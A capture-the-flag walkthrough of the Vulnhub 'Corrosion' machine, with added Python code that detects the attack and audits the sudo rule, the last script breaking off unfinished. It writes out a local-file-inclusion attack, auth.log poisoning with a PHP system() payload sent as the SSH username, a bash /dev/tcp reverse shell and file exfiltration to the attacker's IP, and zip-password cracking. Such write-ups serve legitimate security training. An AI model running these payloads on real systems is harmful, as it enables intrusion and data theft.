Vulnhub Corrosion: detailed walkthrough

Corrosion

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.89.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:c4:83:a7      1      60  PCS Systemtechnik GmbH
 192.168.56.180  08:00:27:21:e8:08      1      60  PCS Systemtechnik GmbH


Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.180.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.180 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 04:22 EST
Nmap scan report for bogon (192.168.56.180)
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0c:a7:1c:8b:4e:85:6b:16:8c:fd:b7:cd:5f:60:3e:a4 (RSA)
|   256 0f:24:f4:65:af:50:d3:d3:aa:09:33:c3:17:3d:63:c7 (ECDSA)
|_  256 b0:fa:cd:77:73:da:e4:7d:c8:75:a1:c5:5f:2c:21:0a (ED25519)
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:21:E8:08 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds
                                                                         

The target host has two open ports: 22 (SSH) and 80 (HTTP).

Get Access

Visiting port 80 returns the Apache default page.

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/robots.txt     
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.56.180 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/tasks/tasks_todo.txt
# Tasks that need to be completed

1. Change permissions for auth log
2. Change port 22 -> 7672
3. Set up phpMyAdmin

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/blog-post/          
<!DOCTYPE html>
<html>
<body>

<h1>Welcome to my Blog!</h1>
<p>This website is in development. Will be updated in the next couple Months! - randy</p>

<img src="image.jpg">

</body>
</html>
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ wget http://192.168.56.180/blog-post/image.jpg
--2022-11-16 04:29:00--  http://192.168.56.180/blog-post/image.jpg
Connecting to 192.168.56.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 429872 (420K) [image/jpeg]
Saving to: ‘image.jpg’

image.jpg                                                100%[===============================================================================================================================>] 419.80K  --.-KB/s    in 0.001s  

2022-11-16 04:29:00 (275 MB/s) - ‘image.jpg’ saved [429872/429872]

                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ ls
image.jpg  nmap_full_scan
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ steghide extract -sf image.jpg                             
Enter passphrase: 
steghide: could not extract any data with that passphrase!
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ stegseek image.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.18% (132.3 MB)           
[!] error: Could not find a valid passphras

Continue enumerating directories and files under /blog-post.

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ gobuster dir -u http://192.168.56.180/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.180/blog-post/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/16 04:30:16 Starting gobuster in directory enumeration mode
===============================================================
/archives             (Status: 301) [Size: 329] [--> http://192.168.56.180/blog-post/archives/]
/uploads              (Status: 301) [Size: 328] [--> http://192.168.56.180/blog-post/uploads/]
Progress: 213842 / 220561 (96.95%)===============================================================
2022/11/16 04:30:28 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/blog-post/archives/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /blog-post/archives</title>
 </head>
 <body>
<h1>Index of /blog-post/archives</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/blog-post/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="randylogs.php">randylogs.php</a></td><td align="right">2021-07-29 17:20  </td><td align="right">140 </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.56.180 Port 80</address>
</body></html>

Requesting /blog-post/archives/randylogs.php returns nothing, so use wfuzz to fuzz for the name of the parameter it accepts.

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ wfuzz -c -u http://192.168.56.180/blog-post/archives/randylogs.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.180/blog-post/archives/randylogs.php?FUZZ=../../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                         
=====================================================================

000000759:   200        48 L     85 W       2832 Ch     "file" 

Fuzzing shows the parameter name is file; confirm it manually.

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/blog-post/archives/randylogs.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
nm-openvpn:x:117:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:118:123::/nonexistent:/bin/false
sssd:x:119:124:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
saned:x:120:126::/var/lib/saned:/usr/sbin/nologin
colord:x:121:127:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
hplip:x:124:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
randy:x:1000:1000:randy,,,:/home/randy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:127:65534::/run/sshd:/usr/sbin/nologin

The /tasks file hinted at the auth log.

http://192.168.56.180/blog-post/archives/randylogs.php?file=/var/log/auth.log
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ curl http://192.168.56.180/blog-post/archives/randylogs.php?file=/var/log/auth.log
Nov 16 10:19:19 corrosion gdm-launch-environment]: pam_unix(gdm-launch-environment:session): session opened for user gdm by (uid=0)
Nov 16 10:19:19 corrosion systemd-logind[683]: New session c1 of user gdm.
Nov 16 10:19:19 corrosion systemd: pam_unix(systemd-user:session): session opened for user gdm by (uid=0)
Nov 16 10:19:22 corrosion polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.43 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8)
Nov 16 10:19:45 corrosion dbus-daemon[647]: [system] Failed to activate service 'org.bluez': timed out (service_start_timeout=25000ms)
Nov 16 10:20:01 corrosion CRON[1405]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:20:01 corrosion CRON[1405]: pam_unix(cron:session): session closed for user root
Nov 16 10:21:01 corrosion CRON[1413]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:21:01 corrosion CRON[1413]: pam_unix(cron:session): session closed for user root
Nov 16 10:22:01 corrosion CRON[1417]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:22:01 corrosion CRON[1417]: pam_unix(cron:session): session closed for user root
Nov 16 10:22:23 corrosion sshd[1420]: error: kex_exchange_identification: Connection closed by remote host
Nov 16 10:22:23 corrosion sshd[1420]: Connection closed by 192.168.56.137 port 60174
Nov 16 10:22:29 corrosion sshd[1421]: error: Protocol major versions differ: 2 vs. 1
Nov 16 10:22:29 corrosion sshd[1422]: error: Protocol major versions differ: 2 vs. 1
Nov 16 10:22:29 corrosion sshd[1422]: banner exchange: Connection from 192.168.56.137 port 41008: could not read protocol version
Nov 16 10:22:29 corrosion sshd[1421]: banner exchange: Connection from 192.168.56.137 port 40998: could not read protocol version
Nov 16 10:22:29 corrosion sshd[1423]: Unable to negotiate with 192.168.56.137 port 41016: no matching host key type found. Their offer: ssh-dss [preauth]
Nov 16 10:22:29 corrosion sshd[1425]: Connection closed by 192.168.56.137 port 41032 [preauth]
Nov 16 10:22:29 corrosion sshd[1427]: Connection closed by 192.168.56.137 port 41036 [preauth]
Nov 16 10:22:29 corrosion sshd[1430]: Unable to negotiate with 192.168.56.137 port 41052: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Nov 16 10:22:29 corrosion sshd[1432]: Unable to negotiate with 192.168.56.137 port 41054: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
Nov 16 10:22:29 corrosion sshd[1434]: Connection closed by 192.168.56.137 port 41068 [preauth]
Nov 16 10:23:01 corrosion CRON[1436]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:23:01 corrosion CRON[1436]: pam_unix(cron:session): session closed for user root
Nov 16 10:24:01 corrosion CRON[1441]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:24:01 corrosion CRON[1441]: pam_unix(cron:session): session closed for user root
Nov 16 10:25:01 corrosion CRON[1556]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:25:01 corrosion CRON[1556]: pam_unix(cron:session): session closed for user root
Nov 16 10:26:01 corrosion CRON[1575]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:26:01 corrosion CRON[1575]: pam_unix(cron:session): session closed for user root
Nov 16 10:27:01 corrosion CRON[1578]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:27:01 corrosion CRON[1578]: pam_unix(cron:session): session closed for user root
Nov 16 10:28:01 corrosion CRON[1582]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:28:01 corrosion CRON[1582]: pam_unix(cron:session): session closed for user root
Nov 16 10:29:01 corrosion CRON[1585]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:29:01 corrosion CRON[1585]: pam_unix(cron:session): session closed for user root
Nov 16 10:30:01 corrosion CRON[1602]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:30:01 corrosion CRON[1601]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:30:01 corrosion CRON[1601]: pam_unix(cron:session): session closed for user root
Nov 16 10:30:01 corrosion CRON[1602]: pam_unix(cron:session): session closed for user root
Nov 16 10:31:01 corrosion CRON[1614]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:31:01 corrosion CRON[1614]: pam_unix(cron:session): session closed for user root
Nov 16 10:32:01 corrosion CRON[1624]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:32:01 corrosion CRON[1624]: pam_unix(cron:session): session closed for user root
Nov 16 10:33:01 corrosion CRON[1629]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:33:01 corrosion CRON[1629]: pam_unix(cron:session): session closed for user root
Nov 16 10:34:01 corrosion CRON[1632]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:34:01 corrosion CRON[1632]: pam_unix(cron:session): session closed for user root
Nov 16 10:35:01 corrosion CRON[1658]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:35:01 corrosion CRON[1658]: pam_unix(cron:session): session closed for user root
Nov 16 10:36:01 corrosion CRON[1661]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:36:01 corrosion CRON[1661]: pam_unix(cron:session): session closed for user root
Nov 16 10:37:01 corrosion CRON[1664]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:37:01 corrosion CRON[1664]: pam_unix(cron:session): session closed for user root
Nov 16 10:38:01 corrosion CRON[1668]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:38:01 corrosion CRON[1668]: pam_unix(cron:session): session closed for user root
Nov 16 10:39:01 corrosion CRON[1673]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:39:01 corrosion CRON[1672]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:39:01 corrosion CRON[1672]: pam_unix(cron:session): session closed for user root
Nov 16 10:39:01 corrosion CRON[1673]: pam_unix(cron:session): session closed for user root
Nov 16 10:40:01 corrosion CRON[1754]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:40:01 corrosion CRON[1754]: pam_unix(cron:session): session closed for user root
Nov 16 10:41:01 corrosion CRON[1757]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:41:01 corrosion CRON[1757]: pam_unix(cron:session): session closed for user root
Nov 16 10:42:01 corrosion CRON[1760]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 16 10:42:01 corrosion CRON[1760]: pam_unix(cron:session): session closed for user root

Now we need to get a PHP one-liner written into that log. An SSH login attempt does it, since sshd records the username it was offered in auth.log.

Then the auth log is requested again through randylogs.php, with the command passed in an extra query parameter.

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ ssh '<?php system($_GET["beijing"]); ?>'@192.168.56.180  

Then request the auth log file with the beijing parameter.

http://192.168.56.180/blog-post/archives/randylogs.php?file=/var/log/auth.log&beijing=uname%20-a

The command output comes back successfully; next, get a shell.

bash -c 'bash -i >& /dev/tcp/192.168.56.137/5555 0>&1'

URL-encode it:

bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.137%2F5555%200%3E%261'

Kali Linux successfully receives the shell.

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ sudo nc -nlvp 5555                                                                           
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.180] 54228
bash: cannot set terminal process group (899): Inappropriate ioctl for device
bash: no job control in this shell
www-data@corrosion:/var/www/html/blog-post/archives$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@corrosion:/var/www/html/blog-post/archives$ 
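As an added, defender-side example (my code, not part of the original post): detection logic for the chain above, run over constructed Apache access-log and auth.log lines that mirror it. It flags traversal and absolute-path values in the file parameter, PHP tags arriving in auth.log through an SSH username, and the combination of the two; the IPs, timestamps and log lines are constructed samples, not captures from the machine.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache access-log lines (not captured from the box): a normal
# request, the traversal probe, and the absolute-path read of auth.log.
ACCESS_LOG = """\
192.168.56.137 - - [16/Nov/2022:04:29:00 -0500] "GET /blog-post/image.jpg HTTP/1.1" 200 429872
192.168.56.137 - - [16/Nov/2022:04:31:10 -0500] "GET /blog-post/archives/randylogs.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2832
192.168.56.137 - - [16/Nov/2022:04:35:02 -0500] "GET /blog-post/archives/randylogs.php?file=/var/log/auth.log&beijing=uname%20-a HTTP/1.1" 200 9120
"""

# Constructed sshd entries: sshd writes the username offered at login verbatim
# into auth.log, which is how a PHP tag ends up inside a file the web app reads.
AUTH_LOG = """\
Nov 16 10:42:01 corrosion CRON[1760]: pam_unix(cron:session): session closed for user root
Nov 16 10:45:12 corrosion sshd[1801]: Invalid user <?php system($_GET["beijing"]); ?> from 192.168.56.137 port 50122
Nov 16 10:45:15 corrosion sshd[1801]: Connection closed by invalid user <?php system($_GET["beijing"]); ?> 192.168.56.137 port 50122 [preauth]
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Prefixes a "file"-style parameter should never legitimately point at.
SENSITIVE_PREFIXES = ("/etc/", "/var/log/", "/proc/", "/home/", "/root/")
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)


def classify_value(value):
    """Return why a query value looks like a file-inclusion attempt, or None."""
    decoded = unquote(unquote(value))  # parse_qsl decoded once; also catch double encoding
    if "../" in decoded or "..\\" in decoded:
        return "traversal"
    if decoded.startswith(SENSITIVE_PREFIXES):
        return "absolute-path"
    return None


def find_lfi_requests(log_text):
    """Scan access-log lines; return one finding per suspicious query parameter."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                hits.append({"ip": m.group("ip"), "param": name, "value": value,
                             "reason": reason, "status": int(m.group("status"))})
    return hits


def find_log_poisoning(log_text):
    """Return sshd lines whose logged username carries a PHP open tag."""
    return [line for line in log_text.splitlines()
            if "sshd[" in line and PHP_TAG_RE.search(line)]


def poisoning_chain_observed(access_text, auth_text):
    """True when a PHP tag sits in auth.log and the web app was then asked to read that log."""
    poisoned = bool(find_log_poisoning(auth_text))
    log_read = any(h["value"].endswith("auth.log") and h["status"] == 200
                   for h in find_lfi_requests(access_text))
    return poisoned and log_read


if __name__ == "__main__":
    for hit in find_lfi_requests(ACCESS_LOG):
        print("LFI:", hit)
    for line in find_log_poisoning(AUTH_LOG):
        print("POISON:", line)
    print("chain observed:", poisoning_chain_observed(ACCESS_LOG, AUTH_LOG))
```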

To download the file from the backups directory, open a second listener.

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ sudo nc -nlvp 6666 >user.zip                               
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.180] 45542

On the target, run:

www-data@corrosion:/var$ cd backups
cd backups
www-data@corrosion:/var/backups$ ls 
ls 
alternatives.tar.0
alternatives.tar.1.gz
apt.extended_states.0
dpkg.arch.0
dpkg.arch.1.gz
dpkg.arch.2.gz
dpkg.diversions.0
dpkg.diversions.1.gz
dpkg.diversions.2.gz
dpkg.statoverride.0
dpkg.statoverride.1.gz
dpkg.statoverride.2.gz
dpkg.status.0
dpkg.status.1.gz
dpkg.status.2.gz
user_backup.zip
www-data@corrosion:/var/backups$ cat user_backup.zip > /dev/tcp/192.168.56.137/6666
< cat user_backup.zip > /dev/tcp/192.168.56.137/6666

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ unzip user.zip         
Archive:  user.zip
[user.zip] id_rsa password:

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ zip2john user.zip > hashes 
ver 2.0 efh 5455 efh 7875 user.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1979, decmplen=2590, crc=A144E09A ts=0298 cs=0298 type=8
ver 2.0 efh 5455 efh 7875 user.zip/id_rsa.pub PKZIP Encr: TS_chk, cmplen=470, decmplen=563, crc=41C30277 ts=029A cs=029a type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** user.zip/my_password.txt PKZIP Encr: TS_chk, cmplen=35, decmplen=23, crc=21E9B663 ts=02BA cs=02ba type=0
ver 2.0 efh 5455 efh 7875 user.zip/easysysinfo.c PKZIP Encr: TS_chk, cmplen=115, decmplen=148, crc=A256BBD9 ts=0170 cs=0170 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ ls
hashes  image.jpg  log  nmap_full_scan  user.zip
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes   
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!randybaby       (user.zip)     
1g 0:00:00:01 DONE (2022-11-16 05:23) 0.9174g/s 13156Kp/s 13156Kc/s 13156KC/s "2parrow"..!LUVP3DRO
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                       

This yields user randy's private key and password; use them to log in via SSH.

┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ cat my_password.txt 
randylovesgoldfish1998
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Corrosion]
└─$ ssh randy@192.168.56.180          
randy@192.168.56.180's password: 
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

119 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Jul 30 15:28:02 2021 from 10.0.0.69
randy@corrosion:~$ id
uid=1000(randy) gid=1000(randy) groups=1000(randy),4(adm),24(cdrom),30(dip),46(plugdev),121(lpadmin),133(sambashare)
randy@corrosion:~$ 

randy@corrosion:~$ sudo -l
[sudo] password for randy: 

Sorry, try again.
[sudo] password for randy: 
Sorry, try again.
[sudo] password for randy: 
Matching Defaults entries for randy on corrosion:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User randy may run the following commands on corrosion:
    (root) PASSWD: /home/randy/tools/
randy@corrosion:~/tools$ ls
custombinary.c  easysysinfo  easysysinfo.py
randy@corrosion:~/tools$ ls -alh
total 32K
drwxrwxr-x  2 randy randy 4.0K Nov 16 11:29 .
drwxr-x--- 17 randy randy 4.0K Jul 30  2021 ..
-rw-rw-r--  1 randy randy  104 Nov 16 11:29 custombinary.c
-rwxrwxr-x  1 randy randy  16K Nov 16 11:29 easysysinfo
-rwxr-xr-x  1 root  root   318 Jul 29  2021 easysysinfo.py
randy@corrosion:~/tools$ file easysysinfo
easysysinfo: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6e5c9acf0c78eb358c90c51a3be4cf3563ef744d, for GNU/Linux 3.2.0, not stripped

Although easysysinfo can be used to escalate privileges, it is a compiled binary that cannot be edited and its purpose is unknown, so instead write a separate program that spawns a root shell and replace easysysinfo with it.

randy@corrosion:~$ cd /home/randy/tools
randy@corrosion:~/tools$ ls -alh
total 28K
drwxrwxr-x  2 randy randy 4.0K Jul 30  2021 .
drwxr-x--- 17 randy randy 4.0K Jul 30  2021 ..
-rwsr-xr-x  1 root  root   16K Jul 30  2021 easysysinfo
-rwxr-xr-x  1 root  root   318 Jul 29  2021 easysysinfo.py
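As an added defensive check (my code, not from the post or the machine): a small audit that parses the listing above and spells out why the sudo rule (root) PASSWD: /home/randy/tools/ is dangerous, and contrasts it with a root-owned location. The safe listing under /usr/local/bin is constructed for the comparison.

```python
import re
from collections import namedtuple

Entry = namedtuple("Entry", "perms owner group name")

# Taken from the `sudo -l` output and the `ls -alh` listing in the post.
TOOLS_RULE = "/home/randy/tools/"
TOOLS_LISTING = """\
drwxrwxr-x  2 randy randy 4.0K Jul 30  2021 .
drwxr-x--- 17 randy randy 4.0K Jul 30  2021 ..
-rwsr-xr-x  1 root  root   16K Jul 30  2021 easysysinfo
-rwxr-xr-x  1 root  root   318 Jul 29  2021 easysysinfo.py
"""

# Constructed safe counterpart: root-owned directory, non-setuid root-owned binary.
SAFE_RULE = "/usr/local/bin/easysysinfo"
SAFE_LISTING = """\
drwxr-xr-x  2 root root 4.0K Jul 30  2021 .
drwxr-xr-x 14 root root 4.0K Jul 29  2021 ..
-rwxr-xr-x  1 root root  16K Jul 30  2021 easysysinfo
"""

# perms, link count, owner, group, size, month, day, year-or-time, name
LS_RE = re.compile(
    r"^(?P<perms>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\S+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


def parse_listing(text):
    """Parse `ls -l` style lines into Entry records; unparseable lines are skipped."""
    return [Entry(**m.groupdict()) for m in map(LS_RE.match, text.splitlines()) if m]


def writable_by(entry, user, groups):
    """True if `user` (a member of `groups`) may write to `entry`, judged from its mode string."""
    p = entry.perms                      # index: 0 type, 1-3 owner, 4-6 group, 7-9 other
    if p[8] == "w":                      # world-writable
        return True
    if entry.group in groups and p[5] == "w":
        return True
    return entry.owner == user and p[2] == "w"


def is_setuid(entry):
    return entry.perms[3] in "sS"


def audit_sudo_rule(rule_path, entries, user, groups):
    """Return findings for a sudoers command path, given the listing of its directory.

    A directory rule, a directory the invoking user can write to, and a setuid-root
    binary sitting in such a directory each let that user choose what runs as root.
    """
    findings = []
    if rule_path.endswith("/"):
        findings.append("rule names a directory: every file placed in it runs as root")
    here = next((e for e in entries if e.name == "."), None)
    dir_writable = here is not None and writable_by(here, user, groups)
    if dir_writable:
        findings.append(f"{user} can write to the directory: binaries there can be replaced")
    for e in entries:
        if e.name in (".", "..") or e.perms.startswith("d"):
            continue
        if is_setuid(e) and e.owner == "root" and dir_writable:
            findings.append(f"setuid-root {e.name} lives in a directory {user} controls")
        if writable_by(e, user, groups):
            findings.append(f"{e.name} itself is writable by {user}")
    return findings


if __name__ == "__main__":
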